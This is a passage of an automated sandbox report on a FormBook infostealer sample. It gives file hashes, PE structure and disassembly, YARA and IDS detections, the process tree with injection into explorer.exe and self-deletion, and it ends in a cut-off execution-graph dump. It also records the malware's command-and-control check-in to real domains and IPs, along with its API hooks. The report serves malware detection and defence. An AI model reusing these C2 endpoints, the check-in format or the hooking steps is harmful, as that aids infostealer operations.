              • Successful, ratio: 99%
              • Number of executed functions: 83
              • Number of non-executed functions: 205
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              No simulations
              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
              188.114.97.3 | TT COPY Euro 57,890_CI0099484_pdf.vbs | Get hash | malicious | Browse | www.solpunksnfts.xyz/fd46/?8pTpC=sNKJe5GJXBl7lC+WMo4ENMIbi989MjnGRheq/w7ARN8paTr80aA4mlyrWhjuNqdRzG61&u8R=-ZcXcJP
               | SecuriteInfo.com.BackDoor.SiggenNET.35.30620.exe | Get hash | malicious | Browse | filetransfer.io/data-package/HJQBZPou/download
              Process:C:\Users\user\Desktop\O1ySvN9SvL.exe
              File Type:data
              Category:dropped
              Size (bytes):189439
              Entropy (8bit):7.990543351142842
              Encrypted:true
              SSDEEP:3072:3W8NRWCc/+Y9Mo9Cvaa0i2De04Di8mFKybyGTqdm4GeHI/ynYyK5HXzK0ZX:G8jWaY9rSEin0aYHl7eHsyvizKUX
              MD5:2F03137B6ADB6A4BA50A0A014B8FCF5B
              SHA1:0A5753B7E38D9DBCCC0FCAED140DDDC90EFC0E1B
              SHA-256:1BF030BEE594672626E0855BFBCCDAA99803A12ABCED6B47F079B8C5BAFF8D88
              SHA-512:701CC2857B61D2FB70CE7556BC53B7C45055C1382AE3E288A76307AED77F84DE1C58F93FCD0865334F766F835D7862766CE93105E5E79BE64F161B295E353996
              Malicious:false
              Reputation:low
              Process:C:\Users\user\Desktop\O1ySvN9SvL.exe
              File Type:data
              Category:dropped
              Size (bytes):4811
              Entropy (8bit):6.195912775198777
              Encrypted:false
              SSDEEP:96:yIr2sDOhzseowSoyp4Qo7ubAMaNbULFA5s2Flqj4ONtgOhrukWrISrbBMEPOyAn:DrKtsyM4c/1MA4stgaCRcARZ6
              MD5:5A816A757CA8331C0761575182A29C6A
              SHA1:23C2F53AC662791B9C8594FC7F95D383EC850BFF
              SHA-256:0383B4CF1FFA4FCC73FD47A22FCC3B6E6F3A57F7F5DF8782EC6074325131C501
              SHA-512:7422469246BE9836F82CB6E42764D8332C2506B1C965D5753CD3272ECD8406BDB0AFA28F0A835AD55E7C299C90D8DDC82B54E5253A447418BE4973CE482C4681
              Malicious:false
              Reputation:low
              Process:C:\Users\user\Desktop\O1ySvN9SvL.exe
              File Type:SysEx File - SIEL
              Category:dropped
              Size (bytes):394442
              Entropy (8bit):7.43868018426752
              Encrypted:false
              SSDEEP:6144:/C8jWaY9rSEin0aYHl7eHsyvizKUhxpvncW10o4at3+9:BxY9rS1n0fFq1a+URcW1IaY9
              MD5:5F2A84C4D87AE80B1D56277924271C6B
              SHA1:BF341A6B52F2B69D350AC231E00E7B44224FED0D
              SHA-256:4D361A619A510FC283CDA3C34893C71D1D6B0C0D5F54DBBA246B0D6D893FF51D
              SHA-512:A21DD4791565DE12CDA5BDFEEFC726D51E7C5490AC5C6CD3F8A707F985D925AF316114B1EC1112B8D3E0D302B4692217C9F9FBC5E918D3B08505781F54DDFFBE
              Malicious:false
              Reputation:low
              Process:C:\Users\user\Desktop\O1ySvN9SvL.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):191488
              Entropy (8bit):6.542039769461921
              Encrypted:false
              SSDEEP:3072:qfbnR6BqNvncvhwE8H0o45It38FSDblJpekds39:cpvncW10o4at3+9
              MD5:917BF3E1E68704B188F2192850C76FA6
              SHA1:9AFF83C33B7D35925C4F99075B6659EF9CBE23E0
              SHA-256:D5DF78D10BA5FD20DF7A5F27EE16146FC49842D2CD1FB6FDB94C3ABFF41DC77C
              SHA-512:EA0AD1985F6289DECA99221B6248050F91A7144884805D899E147FD561C931B6F25D9FD3DA290877AA9A37A1DFD67494998CB16B6D1BD0D8475C71422D0E8FB7
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 50%
              Reputation:low
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.946129305576003
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:O1ySvN9SvL.exe
              File size:299086
              MD5:caa4c5d863a9324fa6b3a735ed446897
              SHA1:003348501064dc5646b19019592f8aefa4b44f5b
              SHA256:6796f10e7f6140f26a49bf9446b2c75dfe0e6dc7d7d88cad5e09d9b608107851
              SHA512:b2cdfc4617c7ba15bc75bb9c1aa03c3e26ce7b0553c6198a18f776ae723720191936f49b09167206b71e1b2daaac09e1b10009a814a3fe2d62c18b0e79e5f161
              SSDEEP:6144:B0Ym483boybmrpR0iOITP23OHYx2tF7G2vd5EtPHuwQOEi:q3EybmrrpTUjxyF7XvrEtPHhf
              TLSH:F25413663DE060FFF64104B30A33CB2A93775E151521A51397723FEFAC2A0DAA5263D4
              Icon Hash:b2a88c96b2ca6a72
              Entrypoint:0x4032fa
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x4669CEB6 [Fri Jun 8 21:48:38 2007 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:55f3dfd13c0557d3e32bcbc604441dd3
              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409170h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push ebx
              call dword ptr [00407278h]
              mov dword ptr [00423FD4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F4E8h
              call dword ptr [00407154h]
              push 0040922Ch
              push 00423720h
              call 00007FC668A9FF08h
              call dword ptr [004070B4h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007FC668A9FEF6h
              push ebx
              call dword ptr [00407108h]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423F20h], eax
              mov eax, edi
              jne 00007FC668A9D76Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007FC668A9F9E9h
              push eax
              call dword ptr [00407218h]
              mov dword ptr [esp+1Ch], eax
              jmp 00007FC668A9D7C5h
              cmp cl, 00000020h
              jne 00007FC668A9D768h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007FC668A9D75Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [esp+14h], 00000020h
              jne 00007FC668A9D768h
              inc eax
              mov byte ptr [esp+14h], 00000022h
              cmp byte ptr [eax], 0000002Fh
              jne 00007FC668A9D795h
              inc eax
              cmp byte ptr [eax], 00000053h
              jne 00007FC668A9D770h
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a0 | 0xb4 | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x288 | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x59ac | 0x5a00 | False | 0.668142361111 | data | 6.45807821776 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata | 0x7000 | 0x117a | 0x1200 | False | 0.4453125 | data | 5.17513527374 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0x9000 | 0x1afd8 | 0x400 | False | 0.6015625 | data | 4.98110806401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94448786242 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country
              RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
              RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
              RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
              RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
              RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
              RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
              DLL | Import
              KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, CreateFileA, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CloseHandle, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
              USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
              Language of compilation system | Country where language is spoken | Map
              English | United States
              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              05/27/22-19:11:52.547625 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.2.5 | 188.114.97.3
              05/27/22-19:11:52.547625 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.2.5 | 188.114.97.3
              05/27/22-19:11:52.547625 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.2.5 | 188.114.97.3
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              May 27, 2022 19:11:52.529947996 CEST | 49798 | 80 | 192.168.2.5 | 188.114.97.3
              May 27, 2022 19:11:52.547362089 CEST | 80 | 49798 | 188.114.97.3 | 192.168.2.5
              May 27, 2022 19:11:52.547494888 CEST | 49798 | 80 | 192.168.2.5 | 188.114.97.3
              May 27, 2022 19:11:52.547625065 CEST | 49798 | 80 | 192.168.2.5 | 188.114.97.3
              May 27, 2022 19:11:52.566088915 CEST | 80 | 49798 | 188.114.97.3 | 192.168.2.5
              May 27, 2022 19:11:52.577018023 CEST | 80 | 49798 | 188.114.97.3 | 192.168.2.5
              May 27, 2022 19:11:52.577064037 CEST | 80 | 49798 | 188.114.97.3 | 192.168.2.5
              May 27, 2022 19:11:52.577187061 CEST | 49798 | 80 | 192.168.2.5 | 188.114.97.3
              May 27, 2022 19:11:52.577263117 CEST | 49798 | 80 | 192.168.2.5 | 188.114.97.3
              May 27, 2022 19:11:52.594438076 CEST | 80 | 49798 | 188.114.97.3 | 192.168.2.5
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              May 27, 2022 19:11:52.497391939 CEST | 61478 | 53 | 192.168.2.5 | 8.8.8.8
              May 27, 2022 19:11:52.524352074 CEST | 53 | 61478 | 8.8.8.8 | 192.168.2.5
              May 27, 2022 19:12:35.091423035 CEST | 55316 | 53 | 192.168.2.5 | 8.8.8.8
              May 27, 2022 19:12:35.204619884 CEST | 53 | 55316 | 8.8.8.8 | 192.168.2.5
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
              May 27, 2022 19:11:52.497391939 CEST | 192.168.2.5 | 8.8.8.8 | 0xd852 | Standard query (0) | www.savingshk.com | A (IP address) | IN (0x0001)
              May 27, 2022 19:12:35.091423035 CEST | 192.168.2.5 | 8.8.8.8 | 0x3643 | Standard query (0) | www.viatempo.com | A (IP address) | IN (0x0001)
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
              May 27, 2022 19:11:52.524352074 CEST | 8.8.8.8 | 192.168.2.5 | 0xd852 | No error (0) | www.savingshk.com | | 188.114.97.3 | A (IP address) | IN (0x0001)
              May 27, 2022 19:11:52.524352074 CEST | 8.8.8.8 | 192.168.2.5 | 0xd852 | No error (0) | www.savingshk.com | | 188.114.96.3 | A (IP address) | IN (0x0001)
              May 27, 2022 19:12:35.204619884 CEST | 8.8.8.8 | 192.168.2.5 | 0x3643 | No error (0) | www.viatempo.com | | 216.120.146.201 | A (IP address) | IN (0x0001)
              • www.savingshk.com
              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              0 | 192.168.2.5 | 49798 | 188.114.97.3 | 80 | C:\Windows\explorer.exe
              Timestamp | kBytes transferred | Direction | Data
              May 27, 2022 19:11:52.547625065 CEST | 7559 | OUT | GET /a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf HTTP/1.1
              Host: www.savingshk.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
              May 27, 2022 19:11:52.577018023 CEST | 7560 | IN | HTTP/1.1 301 Moved Permanently
              Date: Fri, 27 May 2022 17:11:52 GMT
              Transfer-Encoding: chunked
              Connection: close
              Cache-Control: max-age=3600
              Expires: Fri, 27 May 2022 18:11:52 GMT
              Location: https://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2fygWVtW%2FKjyGrU7NWl%2BbohYlg4UfYoikT%2FUPdJB%2BdFmXDUSmP8o6%2FpJCFBE%2FfxFhcnIgb4SaX8R9Vw2Fzk%2Fmd1nna9Kad4mly7uwHyZgRnCfzu9LAusoUrkUmH4KJlKWYR0Kg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 71205f497c8d918e-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Code Manipulations

              Function Name | Hook Type | Active in Processes
              PeekMessageA | INLINE | explorer.exe
              PeekMessageW | INLINE | explorer.exe
              GetMessageW | INLINE | explorer.exe
              GetMessageA | INLINE | explorer.exe
              Function Name | Hook Type | New Data
              PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEE
              PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEE
              GetMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEE
              GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEE


              Target ID:0
              Start time:19:10:15
              Start date:27/05/2022
              Path:C:\Users\user\Desktop\O1ySvN9SvL.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\O1ySvN9SvL.exe"
              Imagebase:0x400000
              File size:299086 bytes
              MD5 hash:CAA4C5D863A9324FA6B3A735ED446897
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:1
              Start time:19:10:17
              Start date:27/05/2022
              Path:C:\Users\user\AppData\Local\Temp\zrztlh.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
              Imagebase:0xea0000
              File size:191488 bytes
              MD5 hash:917BF3E1E68704B188F2192850C76FA6
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Antivirus matches:
              • Detection: 50%, ReversingLabs
              Reputation:low

              Target ID:2
              Start time:19:10:17
              Start date:27/05/2022
              Path:C:\Users\user\AppData\Local\Temp\zrztlh.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
              Imagebase:0xea0000
              File size:191488 bytes
              MD5 hash:917BF3E1E68704B188F2192850C76FA6
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Target ID:3
              Start time:19:10:25
              Start date:27/05/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff74fc70000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              Target ID:10
              Start time:19:10:59
              Start date:27/05/2022
              Path:C:\Windows\SysWOW64\NETSTAT.EXE
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
              Imagebase:0x1180000
              File size:32768 bytes
              MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate

              Target ID:12
              Start time:19:11:03
              Start date:27/05/2022
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe"
              Imagebase:0x1100000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:13
              Start time:19:11:05
              Start date:27/05/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff77f440000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high


                Execution Graph

                Execution Coverage:15.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:21.1%
                Total number of Nodes:1254
                Total number of Limit Nodes:27
3144->3145 3146 405df6 LoadLibraryA 3144->3146 3147 40584d 3145->3147 3146->3145 3146->3147 3147->3114 3147->3115 3148 4057cb GetFileAttributesA CreateFileA 3147->3148 3148->3118 3149->3124 3151 405776 lstrlenA 3150->3151 3152 405780 3151->3152 3153 405754 lstrcmpiA 3151->3153 3152->3131 3152->3132 3153->3152 3154 40576d CharNextA 3153->3154 3154->3151 3155->3135 3725 402366 3726 40236c 3725->3726 3727 402a85 17 API calls 3726->3727 3728 40237e 3727->3728 3729 402a85 17 API calls 3728->3729 3730 402388 RegCreateKeyExA 3729->3730 3731 4023b2 3730->3731 3732 40291a 3730->3732 3733 4023ca 3731->3733 3734 402a85 17 API calls 3731->3734 3735 4023d6 3733->3735 3737 402a68 17 API calls 3733->3737 3736 4023c3 lstrlenA 3734->3736 3738 4023f1 RegSetValueExA 3735->3738 3740 402f71 21 API calls 3735->3740 3736->3733 3737->3735 3739 402407 RegCloseKey 3738->3739 3739->3732 3740->3738 3749 401d68 GetDC GetDeviceCaps 3750 402a68 17 API calls 3749->3750 3751 401d84 MulDiv 3750->3751 3752 402a68 17 API calls 3751->3752 3753 401d99 3752->3753 3754 405b16 17 API calls 3753->3754 3755 